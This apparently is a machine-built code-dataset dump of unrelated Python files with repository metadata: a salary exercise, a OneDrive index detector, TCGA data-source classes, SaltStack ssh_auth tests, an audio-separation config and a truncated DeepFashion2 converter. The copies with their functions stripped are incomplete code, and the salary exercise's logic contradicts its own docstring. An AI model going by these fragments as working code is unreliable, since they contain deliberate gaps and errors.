print('Seu aumento foi de 15% e seu salario atual é de R$ {:.2f}'.format(aumento+salario))
| 33.411765 | 118 | 0.683099 | """ Escreva um programa que pergunte o salário de um funcionário e calcule o valor do seu aumento.
Para salários superiores a R$1.250,00, calcule um aumento de 10%. Para os inferiores ou iguais, o aumento é de 15%."""
salario = float(input('Qual valor do seu salario R$ '))
if salario <= 1249.99:
aumento = (salario * 10)/ 100
print('Seu aumento foi de 10% e seu salario atual é de R$ {:.2f}'.format(aumento+salario))
else:
aumento = (salario * 15) /100
print('Seu aumento foi de 15% e seu salario atual é de R$ {:.2f}'.format(aumento+salario))
| 0 | 0 | 0 |
c5d0c24a15150b3cdda7f3912e703b749d6efcab | 1,413 | py | Python | lib/od/identity/onedrive_vercel_index.py | ZimCodes/Zyod | 5f9e2138cef01930fdf8d29269495f862c183ccb | [
"MIT"
] | 1 | 2022-03-19T19:12:58.000Z | 2022-03-19T19:12:58.000Z | lib/od/identity/onedrive_vercel_index.py | ZimCodes/Zyod | 5f9e2138cef01930fdf8d29269495f862c183ccb | [
"MIT"
] | 1 | 2022-03-23T12:21:28.000Z | 2022-03-24T02:18:45.000Z | lib/od/identity/onedrive_vercel_index.py | ZimCodes/Zyod | 5f9e2138cef01930fdf8d29269495f862c183ccb | [
"MIT"
] | null | null | null | from .base_identity import BaseIdentity
from ...driver.support.driver_support import DriverSupport
class OneDriveVercelIndex(BaseIdentity):
"""OneDriveVercelIndex object to identify said OD"""
@staticmethod
@staticmethod
def _footer(driver) -> bool:
"""Check for the 'powered by onedrive-vercel-index' tagline
:param WebDriver driver: Selenium WebDriver
:return:
"""
return OneDriveVercelIndex._attr_check(driver, "main + div a[href]", "href",
"spencerwooo/onedrive-vercel-index")
@staticmethod
def _meta_tag(driver) -> bool:
"""Search meta tag for id
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, 'meta[content="OneDrive Vercel Index"]', "")
return bool(element)
@staticmethod
def _flag_crumb(driver) -> bool:
"""Finds id of the through its iconic flag
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, r"div.dark\:text-gray-300 div a", "")
return OneDriveVercelIndex._text_check(element, "🚩 Home")
| 33.642857 | 96 | 0.64402 | from .base_identity import BaseIdentity
from ...driver.support.driver_support import DriverSupport
class OneDriveVercelIndex(BaseIdentity):
"""OneDriveVercelIndex object to identify said OD"""
@staticmethod
def is_od(driver) -> bool:
return OneDriveVercelIndex._footer(driver) or OneDriveVercelIndex._meta_tag(driver) or \
OneDriveVercelIndex._flag_crumb(driver)
@staticmethod
def _footer(driver) -> bool:
"""Check for the 'powered by onedrive-vercel-index' tagline
:param WebDriver driver: Selenium WebDriver
:return:
"""
return OneDriveVercelIndex._attr_check(driver, "main + div a[href]", "href",
"spencerwooo/onedrive-vercel-index")
@staticmethod
def _meta_tag(driver) -> bool:
"""Search meta tag for id
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, 'meta[content="OneDrive Vercel Index"]', "")
return bool(element)
@staticmethod
def _flag_crumb(driver) -> bool:
"""Finds id of the through its iconic flag
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, r"div.dark\:text-gray-300 div a", "")
return OneDriveVercelIndex._text_check(element, "🚩 Home")
| 157 | 0 | 26 |
4f8cf2874f900c610e1a276ea22e8e8ecd208a6f | 3,534 | py | Python | mev/api/public_data/sources/gdc/tcga.py | hsph-qbrc/mev-backend | c381800aa7d53d7256e89a4db5a0f9444264e9a6 | [
"MIT"
] | null | null | null | mev/api/public_data/sources/gdc/tcga.py | hsph-qbrc/mev-backend | c381800aa7d53d7256e89a4db5a0f9444264e9a6 | [
"MIT"
] | null | null | null | mev/api/public_data/sources/gdc/tcga.py | hsph-qbrc/mev-backend | c381800aa7d53d7256e89a4db5a0f9444264e9a6 | [
"MIT"
] | null | null | null | import copy
import re
import json
import logging
import requests
import datetime
import shutil
import os
import tarfile
import uuid
import pandas as pd
from django.conf import settings
from api.utilities.basic_utils import get_with_retry, \
make_local_directory
from .gdc import GDCDataSource, GDCRnaSeqDataSourceMixin
logger = logging.getLogger(__name__)
class TCGADataSource(GDCDataSource):
'''
A general class for pulling data from TCGA, exposed via the GDC API
'''
# All the TCGA-based data will be stored in this directory
ROOT_DIR = os.path.join(settings.PUBLIC_DATA_DIR, 'tcga')
def get_additional_metadata(self):
'''
For the TCGA datasets, we would like an additional mapping from the shorthand ID
(e.g. TCGA-LUAD) to the "full" name (e.g. lung adenocarcinoma)
'''
mapping = self.query_for_project_names_within_program('TCGA')
return {'tcga_type_to_name_map': mapping}
class TCGARnaSeqDataSource(TCGADataSource, GDCRnaSeqDataSourceMixin):
'''
A specific implementation of the TCGA data source specific to
RNA-seq.
'''
# A short name (string) which can be used as a "title" for the dataset
PUBLIC_NAME = 'TCGA RNA-Seq'
# A longer, more descriptive text explaining the datasource:
DESCRIPTION = ('TCGA RNA-Seq expression data as processed by the'
' Genomic Data Commons'
' <a href="https://docs.gdc.cancer.gov/Data/Bioinformatics_Pipelines/Expression_mRNA_Pipeline/">'
' mRNA analysis pipeline</a>. Quantifications from this pipeline'
' are produced by HTSeq.'
)
# a string which will make it obvious where the data has come from. For example, we can use
# this tag to name an output file produced by this class (e.g. the count matrix).
# We also use this tag
TAG = 'tcga-rnaseq'
# An example of how one might query this dataset, so we can provide useful
# help for dataset creation errors:
EXAMPLE_PAYLOAD = {
'TCGA-UVM': ["<UUID>","<UUID>"],
'TCGA-MESO': ["<UUID>","<UUID>", "<UUID>"]
}
def prepare(self):
'''
Entry method for downloading and munging the TCGA RNA-seq dataset
to a HDF5 file
'''
self._pull_data('TCGA', self.TAG)
def get_additional_metadata(self):
'''
This just uses the parent method which maps the TCGA IDs to
the name (e.g. TCGA-LUAD --> Lung adenocarcinoma)
'''
# uses the get_additional_metadata method of TCGADataSource
# per python's MRO
return super().get_additional_metadata() | 33.028037 | 105 | 0.676853 | import copy
import re
import json
import logging
import requests
import datetime
import shutil
import os
import tarfile
import uuid
import pandas as pd
from django.conf import settings
from api.utilities.basic_utils import get_with_retry, \
make_local_directory
from .gdc import GDCDataSource, GDCRnaSeqDataSourceMixin
logger = logging.getLogger(__name__)
class TCGADataSource(GDCDataSource):
'''
A general class for pulling data from TCGA, exposed via the GDC API
'''
# All the TCGA-based data will be stored in this directory
ROOT_DIR = os.path.join(settings.PUBLIC_DATA_DIR, 'tcga')
def __init__(self):
if not os.path.exists(self.ROOT_DIR):
logger.info('When instantiating an instance of TCGADataSource, the'
' expected directory did not exist. Go create it...'
)
make_local_directory(self.ROOT_DIR)
def download_and_prep_dataset(self):
pass
def get_additional_metadata(self):
'''
For the TCGA datasets, we would like an additional mapping from the shorthand ID
(e.g. TCGA-LUAD) to the "full" name (e.g. lung adenocarcinoma)
'''
mapping = self.query_for_project_names_within_program('TCGA')
return {'tcga_type_to_name_map': mapping}
class TCGARnaSeqDataSource(TCGADataSource, GDCRnaSeqDataSourceMixin):
'''
A specific implementation of the TCGA data source specific to
RNA-seq.
'''
# A short name (string) which can be used as a "title" for the dataset
PUBLIC_NAME = 'TCGA RNA-Seq'
# A longer, more descriptive text explaining the datasource:
DESCRIPTION = ('TCGA RNA-Seq expression data as processed by the'
' Genomic Data Commons'
' <a href="https://docs.gdc.cancer.gov/Data/Bioinformatics_Pipelines/Expression_mRNA_Pipeline/">'
' mRNA analysis pipeline</a>. Quantifications from this pipeline'
' are produced by HTSeq.'
)
# a string which will make it obvious where the data has come from. For example, we can use
# this tag to name an output file produced by this class (e.g. the count matrix).
# We also use this tag
TAG = 'tcga-rnaseq'
# An example of how one might query this dataset, so we can provide useful
# help for dataset creation errors:
EXAMPLE_PAYLOAD = {
'TCGA-UVM': ["<UUID>","<UUID>"],
'TCGA-MESO': ["<UUID>","<UUID>", "<UUID>"]
}
def __init__(self):
super().__init__()
self.date_str = datetime.datetime.now().strftime('%m%d%Y')
def prepare(self):
'''
Entry method for downloading and munging the TCGA RNA-seq dataset
to a HDF5 file
'''
self._pull_data('TCGA', self.TAG)
def create_from_query(self, dataset_db_instance, query_filter, output_name = ''):
return GDCRnaSeqDataSourceMixin.create_from_query(
self, dataset_db_instance, query_filter, output_name
)
def verify_files(self, file_dict):
return GDCRnaSeqDataSourceMixin.verify_files(self, file_dict)
def get_indexable_files(self, file_dict):
return GDCRnaSeqDataSourceMixin.get_indexable_files(self, file_dict)
def get_additional_metadata(self):
'''
This just uses the parent method which maps the TCGA IDs to
the name (e.g. TCGA-LUAD --> Lung adenocarcinoma)
'''
# uses the get_additional_metadata method of TCGADataSource
# per python's MRO
return super().get_additional_metadata() | 749 | 0 | 162 |
3364b33b85badd5f70d904a4134808f39e3df4a1 | 3,996 | py | Python | tests/integration/states/test_ssh_auth.py | fake-name/salt | d8f04936e4407f51946e32e8166159778f6c31a5 | [
"Apache-2.0"
] | 1 | 2021-09-06T00:14:04.000Z | 2021-09-06T00:14:04.000Z | tests/integration/states/test_ssh_auth.py | fake-name/salt | d8f04936e4407f51946e32e8166159778f6c31a5 | [
"Apache-2.0"
] | 2 | 2021-04-30T21:17:57.000Z | 2021-12-13T20:40:23.000Z | tests/integration/states/test_ssh_auth.py | fake-name/salt | d8f04936e4407f51946e32e8166159778f6c31a5 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Test the ssh_auth states
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
# Import salt libs
import salt.utils.files
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest, skip_if_not_root, with_system_user
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
| 35.678571 | 86 | 0.63013 | # -*- coding: utf-8 -*-
"""
Test the ssh_auth states
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
# Import salt libs
import salt.utils.files
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest, skip_if_not_root, with_system_user
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
class SSHAuthStateTests(ModuleCase, SaltReturnAssertsMixin):
@destructiveTest
@skip_if_not_root
@with_system_user("issue_7409", on_existing="delete", delete=True)
@skipIf(True, "SLOWTEST skip")
def test_issue_7409_no_linebreaks_between_keys(self, username):
userdetails = self.run_function("user.info", [username])
user_ssh_dir = os.path.join(userdetails["home"], ".ssh")
authorized_keys_file = os.path.join(user_ssh_dir, "authorized_keys")
ret = self.run_state(
"file.managed",
name=authorized_keys_file,
user=username,
makedirs=True,
contents_newline=False,
# Explicit no ending line break
contents="ssh-rsa AAAAB3NzaC1kc3MAAACBAL0sQ9fJ5bYTEyY== root",
)
ret = self.run_state(
"ssh_auth.present",
name="AAAAB3NzaC1kcQ9J5bYTEyZ==",
enc="ssh-rsa",
user=username,
comment=username,
)
self.assertSaltTrueReturn(ret)
self.assertSaltStateChangesEqual(ret, {"AAAAB3NzaC1kcQ9J5bYTEyZ==": "New"})
with salt.utils.files.fopen(authorized_keys_file, "r") as fhr:
self.assertEqual(
fhr.read(),
"ssh-rsa AAAAB3NzaC1kc3MAAACBAL0sQ9fJ5bYTEyY== root\n"
"ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username),
)
@destructiveTest
@skip_if_not_root
@with_system_user("issue_10198", on_existing="delete", delete=True)
@skipIf(True, "SLOWTEST skip")
def test_issue_10198_keyfile_from_another_env(self, username=None):
userdetails = self.run_function("user.info", [username])
user_ssh_dir = os.path.join(userdetails["home"], ".ssh")
authorized_keys_file = os.path.join(user_ssh_dir, "authorized_keys")
key_fname = "issue_10198.id_rsa.pub"
# Create the keyfile that we expect to get back on the state call
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_PRODENV_STATE_TREE, key_fname), "w"
) as kfh:
kfh.write("ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username))
# Create a bogus key file on base environment
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_STATE_TREE, key_fname), "w"
) as kfh:
kfh.write("ssh-rsa BAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username))
ret = self.run_state(
"ssh_auth.present",
name="Setup Keys",
source="salt://{0}?saltenv=prod".format(key_fname),
enc="ssh-rsa",
user=username,
comment=username,
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(authorized_keys_file, "r") as fhr:
self.assertEqual(
fhr.read(), "ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username)
)
os.unlink(authorized_keys_file)
ret = self.run_state(
"ssh_auth.present",
name="Setup Keys",
source="salt://{0}".format(key_fname),
enc="ssh-rsa",
user=username,
comment=username,
saltenv="prod",
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(authorized_keys_file, "r") as fhr:
self.assertEqual(
fhr.read(), "ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username)
)
| 3,076 | 391 | 23 |
6848665c432b401ac689c588426181ebbfd36cc1 | 232 | py | Python | service_user.py | RobinCAS/CircuitBreaker_py | 941314fec95671a6d5af49f884e585ea1d3a936a | [
"MIT"
] | null | null | null | service_user.py | RobinCAS/CircuitBreaker_py | 941314fec95671a6d5af49f884e585ea1d3a936a | [
"MIT"
] | 1 | 2017-01-05T02:25:25.000Z | 2017-01-05T02:25:25.000Z | service_user.py | RobinCAS/CircuitBreaker_py | 941314fec95671a6d5af49f884e585ea1d3a936a | [
"MIT"
] | null | null | null | """ service_user.py """
from flask import Flask, jsonify
app = Flask(__name__)
@app.route("/user", methods=['GET'])
if __name__ == "__main__":
app.run(port=3002, debug=True)
| 14.5 | 36 | 0.650862 | """ service_user.py """
from flask import Flask, jsonify
app = Flask(__name__)
@app.route("/user", methods=['GET'])
def get_user():
return jsonify(name='CAS')
if __name__ == "__main__":
app.run(port=3002, debug=True)
| 25 | 0 | 22 |
56a6a7bee984a8facda8deb4784fa15bd591ea52 | 2,911 | py | Python | src/shop/business/service.py | goubertbrent/oca-backend | b9f59cc02568aecb55d4b54aec05245790ea25fd | [
"Apache-2.0"
] | null | null | null | src/shop/business/service.py | goubertbrent/oca-backend | b9f59cc02568aecb55d4b54aec05245790ea25fd | [
"Apache-2.0"
] | null | null | null | src/shop/business/service.py | goubertbrent/oca-backend | b9f59cc02568aecb55d4b54aec05245790ea25fd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.rpc import arguments, returns
from rogerthat.bizz.profile import set_service_disabled as rogerthat_set_service_disabled, \
set_service_enabled as rogerthat_re_enable_service
from rogerthat.rpc import users
from rogerthat.rpc.service import BusinessException
from rogerthat.utils import now
from shop.models import Customer
from solutions.common.dal import get_solution_settings
@returns()
@arguments(customer_or_id=(int, long, Customer), disabled_reason_int=(int, long))
def set_service_disabled(customer_or_id, disabled_reason_int):
"""
Disables the customer his service, disconnects all users and sets the service invisible.
Args:
customer_or_id (int, long, Customer): customer or id
disabled_reason_int (int, long): reason why the service has been disabled
Raises:
NoSubscriptionException
BusinessException
"""
if isinstance(customer_or_id, Customer):
customer = customer_or_id
else:
customer = Customer.get_by_id(customer_or_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
if disabled_reason_int not in Customer.DISABLED_REASONS:
raise BusinessException('Invalid disable service reason')
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
customer.service_disabled_at = now()
customer.disabled_reason_int = disabled_reason_int
sln_settings.search_enabled = False
sln_settings.service_disabled = True
db.put([customer, sln_settings])
rogerthat_set_service_disabled(service_user)
@returns()
@arguments(customer_id=int)
| 35.938272 | 92 | 0.762625 | # -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.rpc import arguments, returns
from rogerthat.bizz.profile import set_service_disabled as rogerthat_set_service_disabled, \
set_service_enabled as rogerthat_re_enable_service
from rogerthat.rpc import users
from rogerthat.rpc.service import BusinessException
from rogerthat.utils import now
from shop.models import Customer
from solutions.common.dal import get_solution_settings
@returns()
@arguments(customer_or_id=(int, long, Customer), disabled_reason_int=(int, long))
def set_service_disabled(customer_or_id, disabled_reason_int):
"""
Disables the customer his service, disconnects all users and sets the service invisible.
Args:
customer_or_id (int, long, Customer): customer or id
disabled_reason_int (int, long): reason why the service has been disabled
Raises:
NoSubscriptionException
BusinessException
"""
if isinstance(customer_or_id, Customer):
customer = customer_or_id
else:
customer = Customer.get_by_id(customer_or_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
if disabled_reason_int not in Customer.DISABLED_REASONS:
raise BusinessException('Invalid disable service reason')
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
customer.service_disabled_at = now()
customer.disabled_reason_int = disabled_reason_int
sln_settings.search_enabled = False
sln_settings.service_disabled = True
db.put([customer, sln_settings])
rogerthat_set_service_disabled(service_user)
@returns()
@arguments(customer_id=int)
def set_service_enabled(customer_id):
customer = Customer.get_by_id(customer_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
sln_settings.service_disabled = False
customer.service_disabled_at = 0
customer.disabled_reason = u''
customer.disabled_reason_int = 0
db.put([customer, sln_settings])
rogerthat_re_enable_service(service_user)
| 525 | 0 | 22 |
fe5748f4771bb5c4cdcf7a649ae541fa6ab87fb5 | 2,589 | py | Python | config.py | RetroCirce/Zero_Shot_Audio_Source_Separation | 16b5c2cc9f263c6d17894d433a2da31b07788f4d | [
"MIT"
] | 66 | 2021-12-25T17:09:21.000Z | 2022-03-31T08:15:51.000Z | config.py | RetroCirce/Zero_Shot_Audio_Source_Separation | 16b5c2cc9f263c6d17894d433a2da31b07788f4d | [
"MIT"
] | 13 | 2022-01-06T04:12:37.000Z | 2022-03-20T23:07:12.000Z | config.py | RetroCirce/Zero_Shot_Audio_Source_Separation | 16b5c2cc9f263c6d17894d433a2da31b07788f4d | [
"MIT"
] | 8 | 2022-02-02T17:42:38.000Z | 2022-03-27T09:12:06.000Z | # Ke Chen
# knutchen@ucsd.edu
# Zero-shot Audio Source Separation via Query-based Learning from Weakly-labeled Data
# The configuration file
# for model training
exp_name = "exp_zs_asp_full" # the saved ckpt prefix name of the model
workspace = "/home/Research/ZS_ASP/" # the folder of your code
dataset_path = "/home/Research/ZS_ASP/data/audioset" # the dataset path
index_type = "full_train"
idc_path = "/home/Research/ZS_ASP/" # the folder of audioset class count files
balanced_data = True
# trained from a checkpoint, or evaluate a single model
resume_checkpoint = None
# "/home/Research/ZS_ASP/model_backup/zeroshot_asp_full.ckpt"
loss_type = "mae"
gather_mode = False
debug = False
classes_num = 527
eval_list = [] # left blank to preserve all classes, otherwise will filter the specified classes
# [15, 63, 81, 184, 335, 449, 474, 348, 486, 4] # randomly generated from the 527-classes for held-out evaludation
batch_size = 16 * 8 # batch size per GPU x GPU number , default is 16 x 8 = 128
learning_rate = 1e-3 # 3e-4 is also workable
max_epoch = 100
num_workers = 3
lr_scheduler_epoch = [90, 110]
latent_dim = 2048
# for signal processing
sample_rate = 32000
clip_samples = sample_rate * 10 # audio_set 10-sec clip
segment_frames = 200
hop_samples = 320
random_seed = 12412 # 444612 1536123 12412
random_mode = "one_class" # "no_random, one_class, random, order", one class is the best
# for evaluation
musdb_path = "/home/Research/ZS_ASP/data/musdb-wav/" # musdb download folder
testavg_path = "/home/Research/ZS_ASP/data/musdb30-train-32000fs.npy" # the processed training set (to get the latent query)
testset_path = "/home/Research/ZS_ASP/data/musdb-test-32000fs.npy" # the processed testing set (to calculate the performance)
test_key = ["vocals", "drums", "bass", "other"] # four tracks for musdb, and your named track for other inference
test_type = "mix"
infer_type = "mean"
energy_thres = 0.1
wave_output_path = "/home/Research/ZS_ASP/wavoutput" # output folder
using_wiener = True # use wiener filter or not (default: True)
using_whiting = False # use whiting or not (default: False)
# weight average
wa_model_folder = "/home/Research/ZS_ASP/version_3/checkpoints/"
wa_model_path = "zs_wa.ckpt"
# for inference
inference_file = "/home/Research/ZS_ASP/data/pagenini.wav" # an audio file to separate
inference_query = "/home/Research/ZS_ASP/data/query" # a folder containing all samples for obtaining the query
overlap_rate = 0.5 # [0.0, 1.0), 0 to disabled, recommand 0.5 for 50% overlap. Overlap will increase computation time and improve result quality | 41.758065 | 144 | 0.759367 | # Ke Chen
# knutchen@ucsd.edu
# Zero-shot Audio Source Separation via Query-based Learning from Weakly-labeled Data
# The configuration file
# for model training
exp_name = "exp_zs_asp_full" # the saved ckpt prefix name of the model
workspace = "/home/Research/ZS_ASP/" # the folder of your code
dataset_path = "/home/Research/ZS_ASP/data/audioset" # the dataset path
index_type = "full_train"
idc_path = "/home/Research/ZS_ASP/" # the folder of audioset class count files
balanced_data = True
# trained from a checkpoint, or evaluate a single model
resume_checkpoint = None
# "/home/Research/ZS_ASP/model_backup/zeroshot_asp_full.ckpt"
loss_type = "mae"
gather_mode = False
debug = False
classes_num = 527
eval_list = [] # left blank to preserve all classes, otherwise will filter the specified classes
# [15, 63, 81, 184, 335, 449, 474, 348, 486, 4] # randomly generated from the 527-classes for held-out evaludation
batch_size = 16 * 8 # batch size per GPU x GPU number , default is 16 x 8 = 128
learning_rate = 1e-3 # 3e-4 is also workable
max_epoch = 100
num_workers = 3
lr_scheduler_epoch = [90, 110]
latent_dim = 2048
# for signal processing
sample_rate = 32000
clip_samples = sample_rate * 10 # audio_set 10-sec clip
segment_frames = 200
hop_samples = 320
random_seed = 12412 # 444612 1536123 12412
random_mode = "one_class" # "no_random, one_class, random, order", one class is the best
# for evaluation
musdb_path = "/home/Research/ZS_ASP/data/musdb-wav/" # musdb download folder
testavg_path = "/home/Research/ZS_ASP/data/musdb30-train-32000fs.npy" # the processed training set (to get the latent query)
testset_path = "/home/Research/ZS_ASP/data/musdb-test-32000fs.npy" # the processed testing set (to calculate the performance)
test_key = ["vocals", "drums", "bass", "other"] # four tracks for musdb, and your named track for other inference
test_type = "mix"
infer_type = "mean"
energy_thres = 0.1
wave_output_path = "/home/Research/ZS_ASP/wavoutput" # output folder
using_wiener = True # use wiener filter or not (default: True)
using_whiting = False # use whiting or not (default: False)
# weight average
wa_model_folder = "/home/Research/ZS_ASP/version_3/checkpoints/"
wa_model_path = "zs_wa.ckpt"
# for inference
inference_file = "/home/Research/ZS_ASP/data/pagenini.wav" # an audio file to separate
inference_query = "/home/Research/ZS_ASP/data/query" # a folder containing all samples for obtaining the query
overlap_rate = 0.5 # [0.0, 1.0), 0 to disabled, recommand 0.5 for 50% overlap. Overlap will increase computation time and improve result quality | 0 | 0 | 0 |
02f91dbb53c6aa165b7007d16cdc9f0a7517c844 | 39,932 | py | Python | projects/FashionNet/scripts/deepfashion2_to_shopee_coco.py | sm047/detectron2 | 1036cce320ce0f2adbce7f143566462d3222bd5a | [
"Apache-2.0"
] | 5 | 2020-06-16T11:31:22.000Z | 2021-11-08T03:07:47.000Z | projects/FashionNet/scripts/deepfashion2_to_shopee_coco.py | fangchengji/detectron2 | 1036cce320ce0f2adbce7f143566462d3222bd5a | [
"Apache-2.0"
] | null | null | null | projects/FashionNet/scripts/deepfashion2_to_shopee_coco.py | fangchengji/detectron2 | 1036cce320ce0f2adbce7f143566462d3222bd5a | [
"Apache-2.0"
] | null | null | null | import json
from PIL import Image
import numpy as np
import shutil
import os
import random
dataset = {
"info": {},
"licenses": [],
"images": [],
"annotations": [],
"annotations2": [],
"categories": [],
"categories2": []
}
dataset['categories'].append({
'id': 1,
'name': "short_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 2,
'name': "long_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 3,
'name': "short_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', 